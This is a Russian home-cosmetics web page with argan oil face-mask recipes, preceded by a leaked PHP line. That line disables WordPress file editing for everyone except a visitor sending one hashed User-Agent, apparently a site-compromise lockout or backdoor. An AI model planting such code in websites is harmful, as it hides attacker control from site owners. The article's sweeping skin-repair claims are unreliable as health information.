if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Молодость и здоровье кожи с аргановым маслом. Рецепты красоты | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Молодость и здоровье кожи с аргановым маслом. Рецепты красоты

Аргановое масло в первую очередь используется для омоложения лица, так как в его составе присутствует линолевая кислота – мощный антиоксидант, который связывает в клетках кожи свободные радикалы, чем предотвращает появление морщин и старение кожи.

Уход за кожей лица с помо­щью арга­но­во­го мас­ло помо­га­ет изба­вить­ся от уже име­ю­щих­ся мор­щин, руб­цов, сле­дов от пры­щей, раз­гла­дит кожу, под­тя­нет овал лица, отлич­но увлаж­нит, сни­мет вос­па­ле­ние, при­даст коже глад­кость и упру­гость. Таким набо­ром свойств арга­но­вое мас­ло обла­да­ет бла­го­да­ря содер­жа­нию в соста­ве широ­ко­го спек­тра вита­ми­нов групп F, Е и набор жир­ных кислот.

Свойства арганового масла

Исполь­зо­ва­ние арга­но­во­го мас­ла в изго­тов­ле­нии кос­ме­ти­че­ских средств помо­жет решить любую про­бле­му так как обла­да­ет широ­ким спек­тром свойств, таких как:

  • Увлаж­не­ние;
  • Пита­ние;
  • Устра­ня­ет вос­па­ли­тель­ные процессы;
  • Вырав­ни­ва­ет рубцы;
  • Пре­пят­ству­ет старению;
  • Под­тя­ги­ва­ет кожу;
  • Устра­ня­ет морщины.

Кос­ме­ти­ка в домаш­них усло­ви­ях с исполь­зо­ва­ни­ем мас­ла из арга­на пода­рит вам сия­ю­щую здо­ро­вьем и при­вле­ка­тель­ную кожу.

Лучшие рецепты с аргановым маслом

21

Маска классическая (быстро увлажняет и устраняет шелушение кожи)

Нане­сти арга­но­вое мас­ло на очи­щен­ную кожу с помо­щью лег­ких похло­пы­ва­ю­щих дви­же­ний. Жела­тель­но выпол­нять про­це­ду­ру перед сном или за час перед выхо­дом на улицу.

Для кожи вокруг глаз

Неж­ная и дели­кат­ная область вокруг глаз нуж­да­ет­ся в осо­бен­ном ухо­де. Смесь арга­но­во­го, олив­ко­во­го и мин­даль­но­го масел помо­жет изба­вить­ся от мел­ких мор­щи­нок и омо­ло­дит кожу. Сме­шав по три кап­ли каж­до­го мас­ла, лег­ки­ми дви­же­ни­я­ми нане­сти смесь вокруг глаз вдоль мас­саж­ных линий. Этот рецепт по сво­им каче­ствам не усту­па­ет даже самым извест­ным и доро­гим сред­ствам от мор­щин вокруг глаз.

Маска от мимических морщин

22Сме­шать пер­си­ко­вое или бана­но­вое пюре (1 ст. лож­ка), арга­но­вое мас­ло и мед (по 1 ч. лож­ке) с эфир­ным мас­лом розы (5 капель). Нане­сти на очи­щен­ную кожу и через 20 минут смыть теп­лой водой с после­ду­ю­щим нане­се­ни­ем увлаж­ня­ю­ще­го кре­ма. Мас­ку мож­но делать 2–3 раза в неделю.

Маска для жирной и проблемной кожи (избавит от прыщей и жирного блеска)

Арга­но­вое мас­ло (1 ст. лож­ка) сме­шать с мас­лом чай­но­го дере­ва (4 кап­ли) и обра­бо­тать про­блем­ные участ­ки. Оста­вить на 40 минут, затем про­сто про­мок­нуть сал­фет­кой, что­бы убрать избыт­ки мас­ла. При­ме­ня­ет­ся 1 раз в день, пока про­бле­ма не исчезнет.

Питательная маска (свежесть и цвет лица)

Арга­но­вое мас­ло сме­шать с нату­раль­ным йогур­том или сме­та­ной и овся­ной мукой (по 1 ст. лож­ке) и доба­вить яич­ный жел­ток (1 шт.). Смесь нане­сти на кожу лица и шеи, через пол­ча­са смыть с после­ду­ю­щим нане­се­ни­ем увлаж­ня­ю­ще­го крема.

Нату­раль­ная кос­ме­ти­ка сво­и­ми рука­ми с исполь­зо­ва­ни­ем арга­но­во­го мас­ла омо­ло­дит и под­тя­нет кожу, пода­рит здо­ро­вый и сия­ю­щий вид.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!